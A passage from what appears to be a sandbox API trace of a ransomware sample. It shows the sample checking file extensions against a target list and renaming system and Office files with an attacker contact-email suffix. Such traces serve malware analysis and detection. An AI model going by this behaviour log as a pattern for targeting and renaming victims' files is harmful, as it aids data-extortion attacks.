(lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0157.268] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=76640) returned 1 [0157.268] CloseHandle (hObject=0x3b0) returned 1 [0157.268] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0157.268] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.268] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.320] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.345] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0157.347] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.666] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0157.694] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4559f98, Size=0x4000) returned 0x4559f98 [0157.695] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.695] lstrlenW (lpString="tabskb.dll.mui") returned 14 [0157.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0157.697] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=5120) returned 1 [0157.697] CloseHandle (hObject=0x414) returned 1 [0157.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui")) returned 0x20 [0157.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.697] lstrlenW (lpString=".doc") returned 4 [0157.698] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.698] lstrlenW (lpString=".docx") returned 5 [0157.698] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.698] lstrlenW (lpString=".pdf") returned 4 [0157.698] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.698] lstrlenW (lpString=".xls") returned 4 [0157.698] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.698] lstrlenW (lpString=".xlsx") returned 5 [0157.698] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.698] lstrlenW (lpString=".ppt") returned 4 [0157.698] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.698] lstrlenW (lpString=".zip") returned 4 [0157.698] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.698] lstrlenW (lpString=".rar") returned 4 [0157.698] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.698] lstrlenW (lpString=".bz2") returned 4 [0157.698] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.698] lstrlenW (lpString=".7z") returned 3 [0157.698] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.698] lstrlenW (lpString=".dbf") returned 4 [0157.698] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.698] lstrlenW (lpString=".1cd") returned 4 [0157.698] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.698] lstrlenW (lpString=".jpg") returned 4 [0157.698] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.699] lstrlenW (lpString=".doc") returned 4 [0157.699] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.699] lstrlenW (lpString=".docx") returned 5 [0157.699] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.699] lstrlenW (lpString=".pdf") returned 4 [0157.699] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.699] lstrlenW (lpString=".xls") returned 4 [0157.699] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.699] lstrlenW (lpString=".xlsx") returned 5 [0157.699] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.699] lstrlenW (lpString=".ppt") returned 4 [0157.699] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.699] lstrlenW (lpString=".zip") returned 4 [0157.699] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.699] lstrlenW (lpString=".rar") returned 4 [0157.699] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.699] lstrlenW (lpString=".bz2") returned 4 [0157.699] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.699] lstrlenW (lpString=".7z") returned 3 [0157.699] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.699] lstrlenW (lpString=".dbf") returned 4 [0157.699] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.700] lstrlenW (lpString=".1cd") returned 4 [0157.700] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 71 [0157.700] lstrlenW (lpString=".jpg") returned 4 [0157.700] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.700] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.700] lstrlenW (lpString="TipRes.dll.mui") returned 14 [0157.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0157.701] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=25088) returned 1 [0157.701] CloseHandle (hObject=0x414) returned 1 [0157.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0x20 [0157.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.702] lstrlenW (lpString=".doc") returned 4 [0157.702] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.702] lstrlenW (lpString=".docx") returned 5 [0157.702] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.702] lstrlenW (lpString=".pdf") returned 4 [0157.702] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.702] lstrlenW (lpString=".xls") returned 4 [0157.702] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.702] lstrlenW (lpString=".xlsx") returned 5 [0157.702] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.702] lstrlenW (lpString=".ppt") returned 4 [0157.702] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.702] lstrlenW (lpString=".zip") returned 4 [0157.702] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.702] lstrlenW (lpString=".rar") returned 4 [0157.703] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.703] lstrlenW (lpString=".bz2") returned 4 [0157.703] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.703] lstrlenW (lpString=".7z") returned 3 [0157.703] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.703] lstrlenW (lpString=".dbf") returned 4 [0157.703] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.703] lstrlenW (lpString=".1cd") returned 4 [0157.703] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.703] lstrlenW (lpString=".jpg") returned 4 [0157.703] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.703] lstrlenW (lpString=".doc") returned 4 [0157.703] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.703] lstrlenW (lpString=".docx") returned 5 [0157.703] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.703] lstrlenW (lpString=".pdf") returned 4 [0157.703] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.703] lstrlenW (lpString=".xls") returned 4 [0157.703] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.703] lstrlenW (lpString=".xlsx") returned 5 [0157.703] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.703] lstrlenW (lpString=".ppt") returned 4 [0157.704] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.704] lstrlenW (lpString=".zip") returned 4 [0157.704] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.704] lstrlenW (lpString=".rar") returned 4 [0157.704] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.704] lstrlenW (lpString=".bz2") returned 4 [0157.704] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.704] lstrlenW (lpString=".7z") returned 3 [0157.704] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.704] lstrlenW (lpString=".dbf") returned 4 [0157.704] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.704] lstrlenW (lpString=".1cd") returned 4 [0157.704] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0157.704] lstrlenW (lpString=".jpg") returned 4 [0157.704] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.704] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.704] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0157.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0157.705] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=9728) returned 1 [0157.705] CloseHandle (hObject=0x414) returned 1 [0157.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui")) returned 0x20 [0157.706] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.706] lstrlenW (lpString=".doc") returned 4 [0157.706] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.706] lstrlenW (lpString=".docx") returned 5 [0157.706] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.706] lstrlenW (lpString=".pdf") returned 4 [0157.706] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.706] lstrlenW (lpString=".xls") returned 4 [0157.706] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.706] lstrlenW (lpString=".xlsx") returned 5 [0157.706] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.706] lstrlenW (lpString=".ppt") returned 4 [0157.706] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.706] lstrlenW (lpString=".zip") returned 4 [0157.706] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.706] lstrlenW (lpString=".rar") returned 4 [0157.706] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.706] lstrlenW (lpString=".bz2") returned 4 [0157.706] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.707] lstrlenW (lpString=".7z") returned 3 [0157.707] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString=".dbf") returned 4 [0157.707] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString=".1cd") returned 4 [0157.707] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString=".jpg") returned 4 [0157.707] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString=".doc") returned 4 [0157.707] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.707] lstrlenW (lpString=".docx") returned 5 [0157.707] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.707] lstrlenW (lpString=".pdf") returned 4 [0157.707] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.707] lstrlenW (lpString=".xls") returned 4 [0157.707] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.707] lstrlenW (lpString=".xlsx") returned 5 [0157.707] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0157.707] lstrlenW (lpString=".ppt") returned 4 [0157.707] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.707] lstrlenW (lpString=".zip") returned 4 [0157.708] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.708] lstrlenW (lpString=".rar") returned 4 [0157.708] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.708] lstrlenW (lpString=".bz2") returned 4 [0157.708] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.708] lstrlenW (lpString=".7z") returned 3 [0157.708] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.708] lstrlenW (lpString=".dbf") returned 4 [0157.708] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.708] lstrlenW (lpString=".1cd") returned 4 [0157.708] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0157.708] lstrlenW (lpString=".jpg") returned 4 [0157.708] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.708] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.708] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0157.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0157.709] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=10752) returned 1 [0157.709] CloseHandle (hObject=0x414) returned 1 [0157.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui")) returned 0x20 [0157.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0157.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0157.710] lstrlenW (lpString=".doc") returned 4 [0157.710] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.710] lstrlenW (lpString=".docx") returned 5 [0157.710] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0157.710] lstrlenW (lpString=".pdf") returned 4 [0157.710] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0158.022] lstrlenW (lpString=".xls") returned 4 [0158.022] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0158.022] lstrlenW (lpString=".xlsx") returned 5 [0158.022] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0158.023] lstrlenW (lpString=".ppt") returned 4 [0158.023] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0158.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 72 [0158.023] lstrlenW (lpString=".zip") returned 4 [0158.023] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0158.023] lstrlenW (lpString=".rar") returned 4 [0158.023] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0158.023] lstrlenW (lpString=".bz2") returned 4 [0158.023] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0158.023] lstrlenW (lpString=".7z") returned 3 [0158.023] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0158.023] 